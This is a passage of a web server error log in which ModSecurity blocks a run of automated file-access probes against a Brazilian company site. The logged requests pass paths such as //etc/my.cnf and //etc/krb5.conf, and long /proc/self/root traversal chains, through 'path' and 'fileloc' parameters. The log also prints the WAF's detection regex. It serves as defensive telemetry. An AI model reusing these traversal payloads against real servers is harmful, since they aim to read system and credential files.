"/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DvHIg5MgXLBnicMCwQAAAco"]
[Fri Mar 20 09:01:20.248246 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.5:39760] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DxCii7xarUs8iHZzbQAAAhY"]
[Fri Mar 20 09:01:20.256216 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.123:39782] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DzJ3M9BSuKP7CAYq_AAAAJI"]
[Fri Mar 20 09:01:20.262304 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.88:39768] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DzJ3M9BSuKP7CAYq9wAAAJg"]
[Fri Mar 20 09:01:20.263279 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.31:39776] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03DzJ3M9BSuKP7CAYq-AAAAJQ"]
[Fri Mar 20 09:01:20.471778 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.72:39820] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03EDJ3M9BSuKP7CAYq_QAAAJc"]
[Fri Mar 20 09:01:20.599530 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.120:39824] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03EPqxLDW4GITHUkT1WQAAAQc"]
[Fri Mar 20 09:01:27.011988 2026] [:error] [pid 11642:tid 140411683178240] [client 57.141.18.12:40232] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03F7ninkcc-iUj5App-QAAA4c"]
[Fri Mar 20 09:01:30.187266 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.36:40436] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03Gta6ubjKNq_cu4biTAAAA0E"]
[Fri Mar 20 09:01:32.648927 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.118:40500] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03G11pVZ5mVmJwsFM9vQAAAFU"]
[Fri Mar 20 09:01:32.726909 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.23:40546] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03HOoXxyEfFpUF8f-MYgAAAVQ"]
[Fri Mar 20 09:01:35.119814 2026] [:error] [pid 9818:tid 140411733534464] [client 57.141.18.2:40562] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03H11pVZ5mVmJwsFM9zAAAAEE"]
[Fri Mar 20 09:01:40.787461 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.51:40746] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03JBCii7xarUs8iHZzkAAAAgs"]
[Fri Mar 20 09:01:44.931266 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.67:40684] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03KPXLqtnMIWvjpaKmngAAAoA"]
[Fri Mar 20 09:01:52.376873 2026] [:error] [pid 21219:tid 140411599251200] [client 57.141.18.57:40800] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03L_XLqtnMIWvjpaKmpQAAApE"]
[Fri Mar 20 09:01:58.995342 2026] [:error] [pid 9818:tid 140411708356352] [client 57.141.18.9:41026] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03Nl1pVZ5mVmJwsFM97AAAAEQ"]
[Fri Mar 20 09:02:02.452491 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.54:41254] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03ORCii7xarUs8iHZzpQAAAgs"]
[Fri Mar 20 09:02:04.233945 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.107:41368] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03PAF0L0L-SsrnPo50wgAAAsQ"]
[Fri Mar 20 09:02:06.125122 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.37:41424] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03PeoXxyEfFpUF8f-McAAAAVQ"]
[Fri Mar 20 09:02:13.562647 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.82:41884] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab03RfqxLDW4GITHUkT1ngAAAQ4"]
[Fri Mar 20 09:02:44.442486 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:34566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03ZBCii7xarUs8iHZz1QAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:02:45.930509 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:44614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03ZfXLqtnMIWvjpaKm0gAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:02:47.287442 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:44616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03Z_HIg5MgXLBnicMDAgAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:02:48.671186 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:44620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03aPqxLDW4GITHUkT1xwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:02:50.003792 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:38610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03ata6ubjKNq_cu4bidAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:02:52.847510 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.243.128:38616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03bDJ3M9BSuKP7CAYrLgAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:02:54.167497 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.243.128:38628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab03brninkcc-iUj5ApqMwAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
